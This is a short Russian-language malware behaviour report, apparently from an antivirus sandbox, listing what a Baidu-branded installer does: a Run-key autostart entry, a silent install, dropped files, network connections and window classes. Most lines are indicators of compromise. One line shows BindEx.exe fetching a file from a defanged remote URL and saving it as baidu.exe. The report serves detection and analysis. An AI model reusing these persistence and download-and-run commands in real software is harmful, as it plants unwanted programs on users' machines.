Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'baidu' = '%PROGRAM_FILES%\baidu\BindEx.exe'
- '%PROGRAM_FILES%\baidu\BindEx.exe'
- '%PROGRAM_FILES%\baidu\BindEx.exe' -u=http://ru.##abaidu.com/baidu/test.txt -n=baidu.exe
- '<Текущая директория>\setup.exe' /VERYSILENT /SP-
- '%TEMP%\is-KHSP6.tmp\setup.tmp' /SL5="$40092,63673,56832,<Текущая директория>\setup.exe" /VERYSILENT /SP-
- %PROGRAM_FILES%\baidu\unins000.dat
- %ALLUSERSPROFILE%\Start Menu\Programs\baidu\baidu.lnk
- %TEMP%\dlinstlit.txt
- %PROGRAM_FILES%\baidu\BindEx.ini
- %PROGRAM_FILES%\baidu\is-3DURT.tmp
- %TEMP%\is-KHSP6.tmp\setup.tmp
- <Текущая директория>\setup.exe
- %PROGRAM_FILES%\baidu\is-DGQ39.tmp
- %TEMP%\is-FBC87.tmp\_isetup\_shfoldr.dll
- %PROGRAM_FILES%\baidu\BindEx.exe
- %TEMP%\is-KHSP6.tmp\setup.tmp
- %TEMP%\is-FBC87.tmp\_isetup\_shfoldr.dll
- %PROGRAM_FILES%\baidu\is-3DURT.tmp в %PROGRAM_FILES%\baidu\BindEx.exe
- %PROGRAM_FILES%\baidu\is-DGQ39.tmp в %PROGRAM_FILES%\baidu\unins000.exe
- 'ru.##abaidu.com':80
- 'localhost':1037
- ru.##abaidu.com/baidu/test.txt
- DNS ASK ru.##abaidu.com
- ClassName: 'TrayNotifyWnd' WindowName: ''
- ClassName: 'SusWnd' WindowName: 'BDMTrayTipWnd'
- ClassName: 'ToolbarWindow32' WindowName: ''
- ClassName: 'Syspager' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''
- ClassName: 'BDMSusFrame' WindowName: 'BDMTips'
- ClassName: 'Indicator' WindowName: ''